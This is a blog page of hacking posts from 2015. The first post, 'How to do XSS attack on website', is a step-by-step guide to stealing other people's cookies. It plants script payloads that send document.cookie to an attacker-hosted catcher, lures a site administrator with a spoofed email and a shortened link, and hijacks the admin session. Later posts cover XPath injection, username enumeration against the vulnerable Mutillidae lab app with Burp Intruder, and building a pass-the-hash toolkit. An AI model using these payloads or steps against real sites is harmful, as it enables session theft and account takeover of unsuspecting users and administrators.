Wednesday, 11 February 2015

HOW TO DO XSS ATTACK ON WEBSITE?

HOW TO DO XSS ATTACK ON WEBSITE?




Hi XSS is in 2 ways, Persistent and Non-Persistent type.

For XSS we will use something called a cookie catcher.
Question will be that why we would need someone else's cookie?
The answer is that we can change our browser's cookies to login as them!!! So lets call it Session Hijacking
First go to a free hosting site like http://www.110mb.com or other php hosting sites and register there. Then download this cookie catcher and upload it.
Cookie Catcher:  http://www.4shared.com/file/B9qRsDxece/cookie_catcher.html

What does the cookie catcher do?

It grabs the user's:

    Cookies

    IP

    Referral link which what page it got to that link

    Time and Date

Get Vulnerable sites:


Ok first we need sites that are vulnerable to XSS so it will work on them.
To test it we will need to add a code after the link.
I will use this site that many of you probably saw it before.
site: click here . Now for testing if a site is vuln or not you can add these codes:

code:

"><script>alert(document.cookie)</script>

code:

'><script>alert(document.cookie)</script>

code:

"><script>alert("test")</script>

code:

'><script>alert("test")</script>

code:

"><body bgcolor="FF000"></body>

code:

"><iframe src="www.google.com" height=800 width=800 frameborder=1 align=center></iframe>


Then if we see a java script popup like this:


xss

Or if you used my testing and you saw the page's background go black or a page of google opens in that site means its vulnerable to XSS attacks.
In the end, if your site is http://www.example.com the link to test it would be: http://www.example.com/index.php?id="><script>alert(document.cookie)</script>


Persistent XSS:

In this method we will grab the victim's cookies with no suspection and completely stealth.
Now assume we have a forum which has HTML enabled or a site which has a comment page which is vulnerable to XSS.
Ok now lets go to this site: click here
Now test and see if the XSS vulnerable test's work on it.
It does!!! And your getting one of the vulnerability's symptoms. So now lets try to grab it's cookies. If there is a box to type and submit it add this:

code

<script>document.location="www.you.110mb.com/cookie catcher.php?c=" + document.cookie</script>

and submit that post in the forum or the comment box also its good to add something before adding the code like: hey i got a problem logging in???
so they wont suspect you .Refresh the page, now go to the newly created page, in the same directory as you saved your cookie catcher .php search for cookies.html which is a new file that show you the cookies. like if your cookie catcher link would be:
http://www.example.com/cookie catcher.php
the container of the cookies would be:
http://www.example.com/cookies.html
Now visit cookies.html and you would see the session of that cookie!
PS: the site i used doesn't support cookies so you can use: click here for cookie supporting.

Now there is another way for a cookie grabbing drive by, add this code and post it:

Code:

<iframe frameborder=0 height=0 width=0 src=javascript:void(document.location="www.you.110mb.com/cookie catcher.php?c="+document.cookie) </iframe>

Then post it in the forum or the comment box.
Now this will open a iframe in the page which will allow you to have the same page in that website. If you don't know about iframes make a new html file in your computer and just do a

<iframe src="www.google.com"></iframe> and you will understand iframes more

ofc the site Needs to have cookies supported! a blank javascript means you need to go to another site.

Non-Persistent XSS:

Ok in this method we will make the victim admin go to our link. First we will pick a XSS vuln site. For this method we will need a search.php which that page is vuln to XSS and has cookies in that page. In the vuln search.php in the textbox for the word to search for type:

code:

<script>alert(document.cookie)</script>

and click the search button. If you see a javascript popup means its vuln to Non-Persistent XSS attack. Ok now we will do something similar.
I will use this link for this method: click here
Now in front of the search.php?search= add this:

Code:

"><script>document.location="www.you.110mb.com/cookie catcher.php?c=" + document.cookie</script>

Now go to http://www.tinyurl.com and shrink the whole page's link. Try to find a site administrator's E-mail in that vuln website and send a Fake Mail from a online fake mailer like this one: 


http://tipstrickshack.blogspot.com/2012/09/how-to-spoof-email-addresses.html


Now in the body just tell something fake like: Hey i found a huge bug in your website! and give him the shrinked link of the search.php which you added the code in front of it to him. so the Tinyurl will mask it and once he goes to the link you will see his cookies in your cookies.html and he will just be redirected to the link in your cookies catcher. No matter what he does and changes his password you can still login as him

Session Hijacking:

Ok now you have the admin's cookies either way, so we need to edit our own browser's cookies. First go to that page's admin login or its main page and delete ALL of your cookies from that page. Now go in your cookies.html page and copy everything in front of the Cookie: in a note opened Notepad. The ; separates cookies from each other so first copy the code before the ; .
Now go in that vuln website and clear the link. instead add this:

Code:

Javascript:void(document.cookie="")

or for an example:

Code:

Javascript:void(document.cookie="__utma=255621336.1130089386.1295743598.1305934653.1305950205.86")

Then visit the link. Do this with all of the cookies and refresh the page. And wham!!! your logged in as administrator :)
Posted by at 1 comment:

XPATH INJECTION TUTORIAL

XPATH INJECTION TUTORIAL



XPath is a language that has been designed and developed to operate on data that is described with XML. The XPath injection allows an attacker to inject XPath elements in a query that uses this language. Some of the possible goals are to bypass authentication or access information in an unauthorized manner.

We are gonna learn using simple example. Download code from here & put it in your local server directory.(Code is created by SAR Group )

Sample XML Document which we gonna use:-

<Employees> 
<!-- Employees Database --> 
  <Employee ID="1"> 
    <FirstName>Johnny</FirstName> 
    <LastName>Bravo</LastName> 
    <UserName>jbravo</UserName> 
    <Password>test123</Password> 
    <Type>Admin</Type> 
  </Employee> 
  <Employee ID="2"> 
    <FirstName>Mark</FirstName> 
    <LastName>Brown</LastName> 
    <UserName>mbrown</UserName> 
    <Password>demopass</Password> 
    <Type>User</Type> 
  </Employee> 
  <Employee ID="3"> 
    <FirstName>William</FirstName> 
    <LastName>Gates</LastName> 
    <UserName>wgates</UserName> 
    <Password>MSRocks!</Password> 
    <Type>User</Type> 
  </Employee> 
  <Employee ID="4"> 
    <FirstName>Chris</FirstName> 
    <LastName>Dawes</LastName> 
    <UserName>cdawes</UserName> 
    <Password>letmein</Password> 
    <Type>User</Type> 
  </Employee> 
</Employees> 

Bypass Authentication:-


Browse to the login.php page; here we can see simple login form.

Bypass Authentication

If the application does not properly filter such input, the tester will be able to inject XPath code and interfere with the query result. For instance, the tester could input the following values:

Username: ' or '1' = '1
Password:  ' or '1' = '1

Bypass Authentication using XPATH injection
Looks quite familiar, doesn't it? Using these parameters, the query becomes:

string(//Employee[uname/text()='' or '1' = '1' and passwd/text()='' or '1' = '1']/account/text())

As in a common SQL Injection attack, we have created a query that is always evaluated as true, which means that the application will authenticate the user even if a username or a password have not been provided.


Blind Xpath Injection:-


If there is no knowledge about the XML data internal details and if the application does not provide useful error messages that help us reconstruct its internal logic, it is possible to perform a Blind XPath Injection attack whose goal is to reconstruct the whole data structure.

Browse to the search.php page. Enter any number, When you provide number it will display FirstName related to their ID.

Blind XPATH Injection
Enter ' or '1' = '1 in search , & you will get all FirstName regardless of any ID(Number).

Blind XPATH Injection
In blind Xpath injection we have to provide special crafted query to application, if query is true we will get result otherwise we will not get any result.Till now We don`t know about any parent or child node of XML document.

Guessing Of Parent Node:-


Supply following query to application & observe result.

' or substring(name(parent::*[position()=1]),1,1)='a

Nothing append , we don`t get FirstName of users.It means first letter of parent node is not "a". Now supply following query

' or substring(name(parent::*[position()=1]),1,1)='E

Blind XPATH Injection
You get result , It means first letter of parent node is "E"

To guess second letter of parent node supply following query

' or substring(name(parent::*[position()=1]),2,1)='m

Following the same procedure, we can extract the full name of the parent node, which was found to be 'Employee'.

We can also get child node. Browse to the xpath.php page & enter following query.

//Employee[position()=3]/child::node()[position()=4]/text()

get-child-node
You got output from parent node Employee id 3 & child node whose position is 2.

To get whole document put following query.

//Employee

Blind Xpath injection
It`s just concept how to retrieve data from XML document using XPATH injection.XPath contains two useful functions that can help you automate the preceding attack and quickly iterate through all nodes and data in the XML document:

  • count() returns the number of child nodes of a given element, which can be used to determine the range of position() values to iterate over.
  •  string-length() returns the length of a supplied string, which can be used to determine the range of substring() values to iterate over.
I used recon-ng xpath bruteforcer for xpath injection attack & we will get back end XML file.

xapth-bruteforcer

Useful Links & Blind XPATH injection Tools:-

https://www.owasp.org/index.php/XPATH_Injection

https://www.owasp.org/index.php/Blind_XPath_Injection

XPATH BLIND EXPLORER:-  http://code.google.com/p/xpath-blind-explorer/downloads/list

XCAT:-  https://github.com/orf/xcat
Posted by at No comments:

coma-seprator


  1. #!/usr/bin/python
  2. # -*- coding: utf-8 -*-
  5. def main():
  6.     passFile = open('temp')
  7.     for line in passFile.readlines():
  8.         user = line.strip().split(";")[0]
  9.         print user
  10.            
  11. if __name__ == '__main__':
  12.     main()

RAW Paste Data


#!/usr/bin/python
# -*- coding: utf-8 -*-


def main():
    passFile = open('temp')
    for line in passFile.readlines():
user = line.strip().split(";")[0]
        print user
           
if __name__ == '__main__':
    main()
Posted by at No comments:

USERNAME ENUMERATION IN MUTILLIDAE USING BURPE INTRUDER.

USERNAME ENUMERATION IN MUTILLIDAE USING BURPE INTRUDER.


Mutillidae  is a free, open source, vulnerable web-application providing a target for web-security tester. Mutillidae can be installed on Linux and Windows using LAMP, WAMP, and XAMMP.

Username Enumeration :- We have an application that will reveal to us when a username exists on the system which can be used in further step like brute-force account.

In Mutilliade login page , when you provide valid username & invalid password , web-application reply us that password incorrect.

Username Enumeration


When we provide invalid username ; then application tell us that Account does not exist.

Username Enumeration Mutillidae

So by monitoring web-application message one can know that username is valid or not.

First we will examine source code of page ; when we provide valid username reply is "var lAuthenticationAttemptResultFlag = 1" & when we provide invalid username reply is "var lAuthenticationAttemptResultFlag = 0"

var lAuthenticationAttemptResultFlag = 1    It means username exist.

var lAuthenticationAttemptResultFlag = 0    It means username does not exist.



Alternatively we can do this by saving both page (valid username & invaild username) source code in text file & then use diff command.

root@bt:~# diff login password
762c762
< var lAuthenticationAttemptResultFlag = 0;
---
> var lAuthenticationAttemptResultFlag = 1;

Now Open burpe suite, setup listener ; try to sign in from browser & capture request.

Burpe-Request

Now right click on request & click on send  to inrtuder.

For position we choose only username.

Burpe-Intruder

On payload tab  ---) payload option  ----) load sample username list.

Intruder-Payload

In option tab      ---)    Grep match     ---) Add
var lAuthenticationAttemptResultFlag = 1; var lAuthenticationAttemptResultFlag = 0;

Intruder-Option

Click on intruder ---) start Attack

Now Burpe make request to login page & examine request & classified responce according to option which we provided.

Intruder-Attack

Click on save , result table & Delimiter click on custom & put ";" ,then select column which we need , in this case i select payload,var lAuthenticationAttemptResultFlag = 1,var lAuthenticationAttemptResultFlag = 0 and then save it.

Intruder-Result

Saved file is look like following format.

Intruder-saved-file

In file first is username ; then true means username exist , false menas username is invalid. So now we only need entry which second column is true.

Possible-Username

So i saved this value in another temp file from where you can extract username from file using delimiter. I used simple python script for this purpose.

Username List
Finally we got list of username which exist on system.
Posted by at No comments:

Username List


  1. admin
  2. adrian
  3. john
  4. jeremy
  5. bryce
  6. samurai
  7. jim
  8. bobby
  9. simba
  10. dreveil
  11. scotty
  12. ca
  13. john
  14. kevin
  15. dave
  16. patches
  17. rocky
  18. ed
  19. acc
  20. access
  21. access
  22. accesspoint
  23. account
  24. account
  25. accountant
  26. accounting
  27. accounting
  28. accounts
  29. ace
  30. activedirectory
  31. active-directory
  32. ad
  33. ad
  34. adabas

RAW Paste Data

admin
adrian
john
jeremy
bryce
samurai
jim
bobby
simba
dreveil
scotty
ca
john
kevin
dave
patches
rocky
ed
acc
access
access
accesspoint
account
account
accountant
accounting
accounting
accounts
ace
activedirectory
active-directory
ad
ad
adabas
Posted by at 1 comment:

Building the pth-suite / Post Install

Building the pth-suite / Post Install

Our first blog entry will discuss the process to build your very own .deb packages for Backtrack R2.

As of right now the build process is centered around Backtrack as the primary attack platform.  However, I've already received a request for assistance in building packages for RedHat / CentOS based distributions.  I will probably also modify the build process to do tarballs as well, as that might be better for some folks.

By default, all my scripts create the .deb packages to install into /opt/pth.  This way they don't overwrite or otherwise conflict with existing packages.  Also, most of the compiled binaries will automatically look in /opt/pth for their required libraries, which makes life easier.

1)  As root, you can checkout the items from google code by doing the following:
# svn checkout http://passing-the-hash.googlecode.com/svn/trunk/ pth-suite
2)  Change directories into the build directory and install the precompilation dependencies.  I tested the scripts from a freshly installed version of Backtrack 5R2.  Hopefully none of the dependencies fail.
# cd pth-suite/build
# sh all-deps.sh


 3)  Execute the script for the utility that you want to build.  In this case we'll go with building Samba 4 and Openchange.  Since Openchange versioning is so closely tied to a particular version of Samba 4, we take advantage of the Openchange Samba 4 build script to ensure that Samba is built the way Openchange wants.  Because of this, this particular build script builds both Samba and then Openchange.  The first step in the build process is to download the source for Openchange and Samba.  From there the script will build everything.  Final packages will be in the packagessubdirectory.
# ./build-samba4-openchange.sh
5)  Repeat the build process for each of the utilities you want to install.  Keep in mind that during their build process they are installed into /opt/pth and then removed as part of creating a package.  Therefore, /opt/pth should not initially exist.  Note the packages will take a while to compile.  Most noteably, Firefox might take a couple of hours depending on your CPU.  You've been warned.

6)  After all the packages have been compiled, you can install the .deb packages using dpkg.
# dpkg -i packages/*.deb

7)  After the installation, you will need to create a file in /etc/ld.so.conf.d to reference the library path /opt/pth/lib.  This is done by:

# echo /opt/pth/lib > /etc/ld.so.conf.d/pth.conf
# ldconfig
8)  Add /opt/pth/bin to your path either manually or by editing ~/.bashrc.
# export PATH=/opt/pth/bin:$PATH

or 
# echo "export PATH=/opt/pth/bin:$PATH" > ~/.bashrc
# . ~/.bashrc

 9)  Have Fun!


Posted by at No comments:
Subscribe to: Comments (Atom)